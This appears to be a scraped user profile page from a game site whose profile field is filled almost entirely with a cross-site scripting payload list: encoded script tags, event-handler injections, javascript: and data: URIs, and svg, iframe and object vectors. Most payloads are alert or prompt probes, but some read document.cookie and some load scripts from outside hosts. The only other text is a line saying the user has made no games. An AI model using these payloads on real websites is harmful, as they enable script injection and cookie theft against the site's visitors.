href=&#34;data:application/x-x509-user-cert;&amp;NewLine;base64&amp;NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==&#34;&amp;#09;&amp;#10;&amp;#11;&gt;X&lt;/a http://www.google&lt;script .com&gt;alert(document.location)&lt;/script &lt;a&amp;#32;href&amp;#61;&amp;#91;&amp;#00;&amp;#93;&#34;&amp;#00; onmouseover=prompt&amp;#40;1&amp;#41;&amp;#47;&amp;#47;&#34;&gt;XYZ&lt;/a &lt;img/src=@&amp;#32;&amp;#13; onerror = prompt(&#39;&amp;#49;&#39;) &lt;style/onload=prompt&amp;#40;&#39;&amp;#88;&amp;#83;&amp;#83;&#39;&amp;#41; &lt;script ^__^&gt;alert(String.fromCharCode(49))&lt;/script ^__^ &lt;/style &amp;#32;&gt;&lt;script &amp;#32; :-(&gt;/**/alert(document.location)/**/&lt;/script &amp;#32; :-( &amp;#00;&lt;/form&gt;&lt;input type&amp;#61;&#34;date&#34; onfocus=&#34;alert(1)&#34;&gt; &lt;form&gt;&lt;textarea &amp;#13; onkeyup=&#39;\u0061\u006C\u0065\u0072\u0074&amp;#x28;1&amp;#x29;&#39;&gt; &lt;script /***/&gt;/***/confirm(&#39;\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450&#39;)/***/&lt;/script /***/ &lt;iframe srcdoc=&#39;&amp;lt;body onload=prompt&amp;lpar;1&amp;rpar;&amp;gt;&#39;&gt; &lt;a href=&#34;javascript:void(0)&#34; onmouseover=&amp;NewLine;javascript:alert(1)&amp;NewLine;&gt;X&lt;/a&gt; &lt;script ~~~&gt;alert(0%0)&lt;/script ~~~&gt; &lt;style/onload=&amp;lt;!--&amp;#09;&amp;gt;&amp;#10;alert&amp;#10;&amp;lpar;1&amp;rpar;&gt; &lt;///style///&gt;&lt;span %2F onmousemove=&#39;alert&amp;lpar;1&amp;rpar;&#39;&gt;SPAN &lt;img/src=&#39;http://i.imgur.com/P8mL8.jpg&#39; onmouseover=&amp;Tab;prompt(1) &amp;#34;&amp;#62;&lt;svg&gt;&lt;style&gt;{-o-link-source&amp;colon;&#39;&lt;body/onload=confirm(1)&gt;&#39; &amp;#13;&lt;blink/&amp;#13; onmouseover=pr&amp;#x6F;mp&amp;#116;(1)&gt;OnMouseOver {Firefox &amp; Opera} &lt;marquee onstart=&#39;javascript:alert&amp;#x28;1&amp;#x29;&#39;&gt;^__^ &lt;div/style=&#34;width:expression(confirm(1))&#34;&gt;X&lt;/div&gt; {IE7} &lt;iframe/%00/ src=javaSCRIPT&amp;colon;alert(1) //&lt;form/action=javascript&amp;#x3A;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;&lt;input/type=&#39;submit&#39;&gt;// /*iframe/src*/&lt;iframe/src=&#34;&lt;iframe/src=@&#34;/onload=prompt(1) /*iframe/src*/&gt; //|\\ &lt;script //|\\ src=&#39;https://dl.dropbox.com/u/13018058/js.js&#39;&gt; //|\\ &lt;/script //|\\ &lt;/font&gt;/&lt;svg&gt;&lt;style&gt;{src&amp;#x3A;&#39;&lt;style/onload=this.onload=confirm(1)&gt;&#39;&lt;/font&gt;/&lt;/style&gt; &lt;a/href=&#34;javascript:&amp;#13; javascript:prompt(1)&#34;&gt;&lt;input type=&#34;X&#34;&gt; &lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1) &lt;/svg&gt;&#39;&#39;&lt;svg&gt;&lt;script &#39;AQuickBrownFoxJumpsOverTheLazyDog&#39;&gt;alert&amp;#x28;1&amp;#x29; {Opera} &lt;a href=&#34;javascript&amp;colon;\u0061&amp;#x6C;&amp;#101%72t&amp;lpar;1&amp;rpar;&#34;&gt;&lt;button&gt; &lt;div onmouseover=&#39;alert&amp;lpar;1&amp;rpar;&#39;&gt;DIV&lt;/div&gt; &lt;iframe style=&#34;position:absolute;top:0;left:0;width:100%;height:100%&#34; onmouseover=&#34;prompt(1)&#34;&gt; &lt;a href=&#34;jAvAsCrIpT&amp;colon;alert&amp;lpar;1&amp;rpar;&#34;&gt;X&lt;/a&gt; &lt;embed src=&#34;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf&#34;&gt; &lt;object data=&#34;http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf&#34;&gt; &lt;var onmouseover=&#34;prompt(1)&#34;&gt;On Mouse Over&lt;/var&gt; &lt;a href=javascript&amp;colon;alert&amp;lpar;document&amp;period;cookie&amp;rpar;&gt;Click Here&lt;/a&gt; &lt;img src=&#34;/&#34; =_=&#34; title=&#34;onerror=&#39;prompt(1)&#39;&#34;&gt; &lt;%&lt;!--&#39;%&gt;&lt;script&gt;alert(1);&lt;/script --&gt; &lt;script src=&#34;data:text/javascript,alert(1)&#34;&gt;&lt;/script&gt; &lt;iframe/src \/\/onload = prompt(1) &lt;iframe/onreadystatechange=alert(1) &lt;svg/onload=alert(1) &lt;input value=&lt;&gt;&lt;iframe/src=javascript:confirm(1) &lt;input type=&#34;text&#34; value=`` &lt;div/onmouseover=&#39;alert(1)&#39;&gt;X&lt;/div&gt; http://www.&lt;script&gt;alert(1)&lt;/script .com &lt;iframe src=j&amp;NewLine;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;v&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;s&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;c&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;i&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;p&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;colon;a&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;l&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;e&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;r&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;t&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;28&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;1&amp;NewLine;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;&amp;Tab;%29&gt;&lt;/iframe&gt; &lt;svg&gt;&lt;script ?&gt;alert(1) &lt;iframe src=j&amp;Tab;a&amp;Tab;v&amp;Tab;a&amp;Tab;s&amp;Tab;c&amp;Tab;r&amp;Tab;i&amp;Tab;p&amp;Tab;t&amp;Tab;:a&amp;Tab;l&amp;Tab;e&amp;Tab;r&amp;Tab;t&amp;Tab;%28&amp;Tab;1&amp;Tab;%29&gt;&lt;/iframe&gt; &lt;img src=xx:xxonerror=alert(1)&gt; &lt;object type=&#34;text/x-scriptlet&#34; data=&#34;http://jsfiddle.net/XLE63/ &#34;&gt;&lt;/object&gt; &lt;meta http-equiv=&#34;refresh&#34; content=&#34;0;javascript&amp;colon;alert(1)&#34;/&gt; &lt;math&gt;&lt;a xlink:href=&#34;//jsfiddle.net/t846h/&#34;&gt;click &lt;embed code=&#34;http://businessinfo.co.uk/labs/xss/xss.swf&#34; allowscriptaccess=always&gt; &lt;svg contentScriptType=text/vbs&gt;&lt;script&gt;MsgBox+1 &lt;a href=&#34;data:text/html;base64_,&lt;svg/onload=\u0061&amp;#x6C;&amp;#101%72t(1)&gt;&#34;&gt;X&lt;/a &lt;iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074(&#39;\u0061&#39;) worksinIE&gt; &lt;script&gt;~&#39;\u0061&#39; ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~&#39;\u0061&#39;)&lt;/script U+ &lt;script/src=&#34;data&amp;colon;text%2Fj\u0061v\u0061script,\u0061lert(&#39;\u0061&#39;)&#34;&gt;&lt;/script a=\u0061 &amp; /=%2F &lt;script/src=data&amp;colon;text/j\u0061v\u0061&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116,\u0061%6C%65%72%74(/XSS/)&gt;&lt;/script &lt;object data=javascript&amp;colon;\u0061&amp;#x6C;&amp;#101%72t(1)&gt; &lt;script&gt;+-+-1-+-+alert(1)&lt;/script&gt; &lt;body/onload=&amp;lt;!--&amp;gt;&amp;#10alert(1)&gt; &lt;script itworksinallbrowsers&gt;/*&lt;script* */alert(1)&lt;/script &lt;img src ?itworksonchrome?\/onerror = alert(1) &lt;svg&gt;&lt;script&gt;//&amp;NewLine;confirm(1);&lt;/script &lt;/svg&gt; &lt;svg&gt;&lt;script onlypossibleinopera:-)&gt; alert(1) &lt;a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&amp;#97v&amp;#97script&amp;#x3A;&amp;#97lert(1)&gt;ClickMe &lt;script x&gt; alert(1) &lt;/script 1=2 &lt;div/onmouseover=&#39;alert(1)&#39;&gt; style=&#34;x:&#34;&gt; &lt;--<img/src=` onerror=alert(1)> --!> <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript&colon;alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

Games Created

This user has not made any games yet.